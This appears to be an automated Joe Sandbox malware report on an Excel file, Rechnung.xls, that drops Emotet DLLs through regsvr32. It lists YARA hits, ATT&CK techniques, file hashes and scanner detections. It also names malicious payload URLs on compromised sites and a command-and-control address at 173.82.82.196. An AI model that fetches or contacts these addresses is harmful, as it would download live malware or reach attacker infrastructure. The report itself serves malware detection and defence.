                      Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D28900 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_000007FEF9D28900
                      Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D28860 HeapCreate,GetVersion,HeapSetInformation,3_2_000007FEF9D28860

                      Stealing of Sensitive Information

                      Source: Yara match File source: 8.2.regsvr32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 7.2.regsvr32.exe.3d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 7.2.regsvr32.exe.3d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.2.regsvr32.exe.1fe0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.regsvr32.exe.2f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.2.regsvr32.exe.1fe0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 8.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 4.2.regsvr32.exe.2e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.regsvr32.exe.150000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 4.2.regsvr32.exe.2e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.regsvr32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.regsvr32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000008.00000002.1240649290.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000005.00000002.943959485.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000007.00000002.953530856.00000000003D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000004.00000002.1241261455.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000002.1240847022.0000000001FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000002.935688692.0000000000150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000002.1241152796.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000007.00000002.953780664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000005.00000002.943507589.00000000002F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000004.00000002.1240660919.00000000002E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000008.00000002.1241141714.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 2 Scripting | Path Interception | 111 Process Injection | 131 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 11 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | 2 Native API | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | LSASS Memory | 1 Query Registry | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | 43 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 1 Virtualization/Sandbox Evasion | Security Account Manager | 121 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 15 Ingress Tool Transfer | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 111 Process Injection | NTDS | 1 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Scheduled Transfer | 3 Non-Application Layer Protocol | SIM Card Swap |  | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Data Transfer Size Limits | 24 Application Layer Protocol | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 2 Scripting | Cached Domain Credentials | 1 Remote System Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Hidden Files and Directories | DCSync | 2 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 2 Obfuscated Files or Information | Proc Filesystem | 16 System Information Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Regsvr32 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction

[Behavior graph: ID 632078, Sample: Rechnung.xls, Start date: 23/05/2022, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label
Rechnung.xls | 42% | Virustotal |
Rechnung.xls | 34% | ReversingLabs | Document-Excel.Trojan.Abracadabra

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dll | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dll | 100% | Joe Sandbox ML |
C:\Users\user\uxevr3.ocx | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dll | 100% | Joe Sandbox ML |
C:\Users\user\uxevr1.ocx | 100% | Joe Sandbox ML |
C:\Users\user\uxevr2.ocx | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dll | 56% | ReversingLabs | Win64.Trojan.Emotet
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dll | 41% | ReversingLabs | Win64.Trojan.Emotet
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dll | 29% | Metadefender |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dll | 59% | ReversingLabs | Win64.Trojan.Emotet

No Antivirus matches

Source | Detection | Scanner | Label
kabeonet.pl | 1% | Virustotal |
salledemode.com | 12% | Virustotal |
vipteck.com | 10% | Virustotal |
windowsupdatebg.s.llnwi.net | 0% | Virustotal |

Source | Detection | Scanner | Label
https://173.82.82.196:8080/ | 100% | URL Reputation | malware
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
https://173.82.82.196/C01- | 100% | Avira URL Cloud | malware
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
http://salledemode.com/tgroup.ge/x4bc2kL4BzGAeUsVi/ | 100% | Avira URL Cloud | malware
https://173.82.82.196/ | 100% | URL Reputation | malware
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
https://vipteck.com/wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/ | 100% | Avira URL Cloud | malware
http://www.kabeonet.pl/wp-admin/VWlAz5vWJNHDb/ | 100% | Avira URL Cloud | malware
http://vipteck.com/wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/ | 100% | Avira URL Cloud | malware
http://kabeonet.pl/wp-admin/VWlAz5vWJNHDb/ | 100% | Avira URL Cloud | malware
https://173.82.82.196:8080/H | 100% | Avira URL Cloud | malware
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
https://173.82.82.196:8080/L | 100% | Avira URL Cloud | malware
https://173.82.82.196/l | 100% | Avira URL Cloud | malware

Name | IP | Active | Malicious | Antivirus Detection | Reputation
kabeonet.pl | 193.143.77.34 | true | false |  | unknown
salledemode.com | 160.153.40.1 | true | true |  | unknown
vipteck.com | 188.114.97.10 | true | false |  | unknown
airliftlimo.com | 159.203.19.2 | true | false |  | high
windowsupdatebg.s.llnwi.net | 95.140.236.128 | true | false |  | unknown
www.kabeonet.pl | unknown | unknown | false |  | unknown

Name | Malicious | Antivirus Detection | Reputation
http://salledemode.com/tgroup.ge/x4bc2kL4BzGAeUsVi/ | true | Avira URL Cloud: malware | unknown
https://vipteck.com/wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/ | true | Avira URL Cloud: malware | unknown
http://www.kabeonet.pl/wp-admin/VWlAz5vWJNHDb/ | true | Avira URL Cloud: malware | unknown
http://vipteck.com/wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/ | true | Avira URL Cloud: malware | unknown
http://kabeonet.pl/wp-admin/VWlAz5vWJNHDb/ | true | Avira URL Cloud: malware | unknown
https://airliftlimo.com/wp-admin/iMc/ | false |  | high

Name | Source | Malicious | Antivirus Detection | Reputation
https://173.82.82.196:8080/ | regsvr32.exe, 00000004.00000003.1001613039.000000000043E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1240840830.000000000043E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1240812626.00000000003CB000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://173.82.82.196/C01- | regsvr32.exe, 00000008.00000002.1240766444.00000000002D7000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://crl.entrust.net/server1.crl0 | regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmp | false |  | high
http://ocsp.entrust.net03 | regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://173.82.82.196/ | regsvr32.exe, 00000006.00000002.1240795899.00000000003BD000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://173.82.82.196:8080/H | regsvr32.exe, 00000008.00000002.1240766444.00000000002D7000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://ocsp.entrust.net0D | regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://secure.comodo.com/CPS0 | regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1240826221.00000000003DA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://173.82.82.196:8080/L | regsvr32.exe, 00000008.00000002.1240766444.00000000002D7000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://crl.entrust.net/2048ca.crl0 | regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://173.82.82.196/l | regsvr32.exe, 00000008.00000002.1240766444.00000000002D7000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown

IP | Domain | Country | ASN | ASN Name | Malicious
159.203.19.2 | airliftlimo.com | United States | 14061 | DIGITALOCEAN-ASNUS | false
188.114.97.10 | vipteck.com | European Union | 13335 | CLOUDFLARENETUS | false
173.82.82.196 | unknown | United States | 35916 | MULTA-ASN1US | true
193.143.77.34 | kabeonet.pl | Poland | 29522 | KEIPL | false
160.153.40.1 | salledemode.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 632078
Start date and time: 2022-05-23 09:18:11 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 1s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Rechnung.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLS@15/16@5/5
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HDC Information:
                                  • Successful, ratio: 51.2% (good quality ratio 27.5%)
                                  • Quality average: 32.8%
                                  • Quality standard deviation: 37.5%
                                  HCA Information:
                                  • Successful, ratio: 95%
                                  • Number of executed functions: 47
                                  • Number of non-executed functions: 246
                                  Cookbook Comments:
                                  • Found application associated with file extension: .xls
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                  • Attach to Office via COM
                                  • Scroll down
                                  • Close Viewer
                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                  • Excluded IPs from analysis (whitelisted): 173.222.108.210, 173.222.108.226
                                  • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

Time | Type | Description
09:18:30 | API Interceptor | 2874x Sleep call for process: regsvr32.exe modified
                                        • 165.22.73.229
                                        VUzZGNPCim.dllGet hashmaliciousBrowse
                                        • 165.22.73.229
                                        ZWc3yi399O.dllGet hashmaliciousBrowse
                                        • 165.22.73.229
                                        CLOUDFLARENETUSxwBgnRX7mc.exeGet hashmaliciousBrowse
                                        • 172.67.135.95
                                        7uvkuUP9Ki.exeGet hashmaliciousBrowse
                                        • 172.67.34.170
                                        854F1E97-5DBB-4A87-A566-33D9012B05E2.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        melimar.com.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        JuBFlRMNEa.exeGet hashmaliciousBrowse
                                        • 172.67.135.95
                                        AGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                        • 188.114.96.10
                                        specyfikacja.xlsxGet hashmaliciousBrowse
                                        • 23.227.38.74
                                        SecuriteInfo.com.Trojan.MSIL.Kryptik.AFET.24264.exeGet hashmaliciousBrowse
                                        • 1.2.3.4
                                        F42E768EAF5BBDE818DFA4A2B00B1BC53D2E8365F646E.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        ZXcGOtlPnA.exeGet hashmaliciousBrowse
                                        • 172.67.188.70
                                        meerkat.arm7-20220522-2050Get hashmaliciousBrowse
                                        • 104.17.134.248
                                        badstuff.ps1Get hashmaliciousBrowse
                                        • 172.67.218.221
                                        #U0645#U0634#U0627#U0647#U062f#U0647_#U0627#U0628#U0644#U0627#U063a#U06cc#U0647.apkGet hashmaliciousBrowse
                                        • 104.21.39.189
                                        REF AMVK22-3480.exeGet hashmaliciousBrowse
                                        • 162.159.129.233
                                        RFQ 61340.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        zkVYp3YMvk.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        https://viewstripo.email/template/69b6c1d6-360b-47af-bbec-994db5af551aGet hashmaliciousBrowse
                                        • 104.18.11.207
                                        WebCompanionInstaller.exeGet hashmaliciousBrowse
                                        • 104.18.87.101
                                        AutoInstall.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        GDtq0zJoVm.exeGet hashmaliciousBrowse
                                        • 162.159.129.233
                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        7dcce5b76c8b17472d024758970a406bInvoice.docxGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        RechnungsDetails.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        Rechnungskorrektur.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        Rechnung 2022.20.05_1440.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        melimar.com.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        AGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        report 340.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        info_1.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        Facture_09.02.2022_V2.xlsbGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        Scan 69.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        Address Changed.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        10082376542717622006.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        6691113204648532361.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        E318709655.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        OGgZVa2y3B.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        E282497021.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        E2992512590.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        L1877777548.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        SecuriteInfo.com.Exploit.Siggen3.32399.24702.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        SecuriteInfo.com.Exploit.Siggen3.32401.11843.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                         Match / Associated Sample Name / Detection
                                         Match: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dll
                                         • Associated sample: melimar.com.xls, Detection: malicious
                                         • Associated sample: AGK-010522 MJEY-210522.xls, Detection: malicious
                                         Match: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dll
                                         • Associated sample: melimar.com.xls, Detection: malicious
                                         • Associated sample: AGK-010522 MJEY-210522.xls, Detection: malicious
                                         Match: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dll
                                         • Associated sample: melimar.com.xls, Detection: malicious
                                         • Associated sample: AGK-010522 MJEY-210522.xls, Detection: malicious
                                                    Process:C:\Windows\System32\regsvr32.exe
                                                    File Type:Microsoft Cabinet archive data, 61480 bytes, 1 file
                                                    Category:dropped
                                                    Size (bytes):61480
                                                    Entropy (8bit):7.9951219482618905
                                                    Encrypted:true
                                                    SSDEEP:1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
                                                    MD5:B9F21D8DB36E88831E5352BB82C438B3
                                                    SHA1:4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
                                                    SHA-256:998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
                                                    SHA-512:D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
                                                    Malicious:false
                                                    Process:C:\Windows\System32\regsvr32.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):330
                                                    Entropy (8bit):3.126909434994818
                                                    Encrypted:false
                                                    SSDEEP:6:kKxBoJN+SkQlPlEGYRMY9z+4KlDA3RUesJ21:fkPlE99SNxAhUesE1
                                                    MD5:6A49FB2C22BA981051DEFE8A1CEE5715
                                                    SHA1:EC21B01F3DE5ADC1857D313D381E52ACFBA22FA5
                                                    SHA-256:8AEBAACDAC7A87C687A8329AF0CC184CBD7E8AACE965EA5970DEF774C71BEDDF
                                                    SHA-512:C282DA783959BA66746726F07E64250CD0B34CA6A4A403DE99C1E5B7635F54BEF65C6F0BB3B135177C2990E8A01D081764096A97458325D75F8BF9FE1F08699F
                                                    Malicious:false
                                                    Preview:p...... .........O..n..(....................................................... ........3k/"[......(...........(...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.3.3.6.b.2.f.2.2.5.b.d.8.1.:.0."...
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):365056
                                                    Entropy (8bit):7.158106334231925
                                                    Encrypted:false
                                                    SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTZA0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVO:i5MR9M6y3TjRIvgMSS3AyUrhYu3j
                                                    MD5:BE9AB3CBCD3C659212F266325283997D
                                                    SHA1:8AE66E545E3F39473BE65759BE466D48448F385C
                                                    SHA-256:278D0C0BAF0203C13A5E72F31027F4FD0921F6FA2A84656485D86F8D09D562C0
                                                    SHA-512:48058CE87D6A2813C60852B435BC43D7F64D0180A63F9F5964123C0009FC4060216749FBE32DF6FC60BC35E139E4B2D24320AEF526BF12A8A57473203B4F942D
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 56%
                                                    Joe Sandbox View:
                                                     • Filename: melimar.com.xls, Detection: malicious
                                                     • Filename: AGK-010522 MJEY-210522.xls, Detection: malicious
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):365056
                                                    Entropy (8bit):7.158099808823071
                                                    Encrypted:false
                                                    SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcT+0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TrRIvgMSS3AyUrhYu3j
                                                    MD5:F11EBAFE4C3C0069090023A6B4CAEC35
                                                    SHA1:3FECC4BC39FA6F17F062473D80F51AAEF8B442DB
                                                    SHA-256:CAE8D1C14C85D10D7413AF876E6748813AD6930CF4D856E120857C4489A690DA
                                                    SHA-512:425ED0A65526F11EADC37C8158C2D53C6A07C234DA59594DEEC8C8B132B6673534371A149CD5EA586ED07B0A517011E6143CE41E5D4D93608208C1DC73880F18
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 41%
                                                    Joe Sandbox View:
                                                     • Filename: melimar.com.xls, Detection: malicious
                                                     • Filename: AGK-010522 MJEY-210522.xls, Detection: malicious
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                    Category:downloaded
                                                    Size (bytes):365056
                                                    Entropy (8bit):7.158106332990621
                                                    Encrypted:false
                                                    SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTb0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TWRIvgMSS3AyUrhYu3j
                                                    MD5:8516983EEDC8690C1495B828B4262A63
                                                    SHA1:BDD250044234E53E9F08DB444A1DE00987735930
                                                    SHA-256:90498F1EE590DA28566434C15EFCFD98E829846F233387553EA655FC7559168D
                                                    SHA-512:C5B6A37A787A70E70BE8614F957C183547B85DFA0913B746F6BC701CEC09BD54E04FB53443DFEFFEDCF83176F581E6A5F4DE06219A1FA6D9D015691E9432CD93
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                     • Antivirus: Metadefender, Detection: 29%
                                                    • Antivirus: ReversingLabs, Detection: 59%
                                                    Joe Sandbox View:
                                                     • Filename: melimar.com.xls, Detection: malicious
                                                     • Filename: AGK-010522 MJEY-210522.xls, Detection: malicious
                                                     IE Cache URL:http://salledemode.com/tgroup.ge/x4bc2kL4BzGAeUsVi/
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):5
                                                    Entropy (8bit):1.5219280948873621
                                                    Encrypted:false
                                                    SSDEEP:3:hn:h
                                                    MD5:FDA44910DEB1A460BE4AC5D56D61D837
                                                    SHA1:F6D0C643351580307B2EAA6A7560E76965496BC7
                                                    SHA-256:933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
                                                    SHA-512:57DDA9AA7C29F960CD7948A4E4567844D3289FA729E9E388E7F4EDCBDF16BF6A94536598B4F9FF8942849F1F96BD3C00BC24A75E748A36FBF2A145F63BF904C1
                                                    Malicious:false
                                                    Preview:0....
                                                    Process:C:\Windows\System32\regsvr32.exe
                                                    File Type:Microsoft Cabinet archive data, 61480 bytes, 1 file
                                                    Category:dropped
                                                    Size (bytes):61480
                                                    Entropy (8bit):7.9951219482618905
                                                    Encrypted:true
                                                    SSDEEP:1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
